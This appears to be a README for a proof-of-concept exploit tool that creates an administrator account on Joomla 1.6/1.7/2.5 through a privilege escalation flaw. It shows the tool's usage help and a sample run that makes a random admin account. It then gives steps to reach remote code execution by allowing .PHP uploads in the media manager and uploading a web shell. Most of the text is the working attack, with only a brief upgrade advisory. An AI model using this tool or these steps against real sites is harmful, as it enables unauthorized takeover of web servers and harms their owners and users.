A Python script to create an administrator account on Joomla! 1.6/1.7/2.5 using a privilege escalation vulnerability
Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.
- Admin user creation on vulnerable Joomla versions
- Supports HTTP/HTTPS, self-signed certificates and weak TLS cipher suites
- Step by step explanation on how to RCE with this admin account
$ ./joomla-admin-account-creation.py -h
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_
usage: joomla-admin-account-creation.py [-h] -t TARGET [-u USERNAME] [-e EMAIL] [-p PASSWORD] [-k] [-v]
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL to Joomla account creation page.
-u USERNAME, --username USERNAME
Username of the account to create.
-e EMAIL, --email EMAIL
Email of the account to create.
-p PASSWORD, --password PASSWORD
Password of the account to create.
-k, --insecure Allow insecure server connections when using SSL (default: False)
-v, --verbose Verbose mode. (default: False)
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_
[>] Generating random values
[>] Username not supplied, using random username : g2V63EdOTt
[>] Email not supplied, using random email : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
[>] Password not supplied, using random password : 64akMNEBMO
[>] Starting exploit
[>] Purposely failing account creation for user 'g2V63EdOTt' ...
[+] Password mismatch (this is expected)!
[+] Really creating account for user 'g2V63EdOTt' ...
[+] Account successfully created !
[+] You can connect to your new account:
| username : g2V63EdOTt
| password : 64akMNEBMO
| email : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
[+] To achieve Remote Code Execution (RCE):
| 1. Login with the 'g2V63EdOTt' account on the admin panel: http://localhost:10080/administrator/index.php
| 2. Go to the media page: http://localhost:10080/administrator/index.php?option=com_media
| 2.1. Click on parameters on the top right of the page.
| 2.2. Add .PHP in the list of allowed extensions.
| 2.3. Upload your shell on the media page.
| 3. Access your shell and enjoy.
[+] Exploit finished.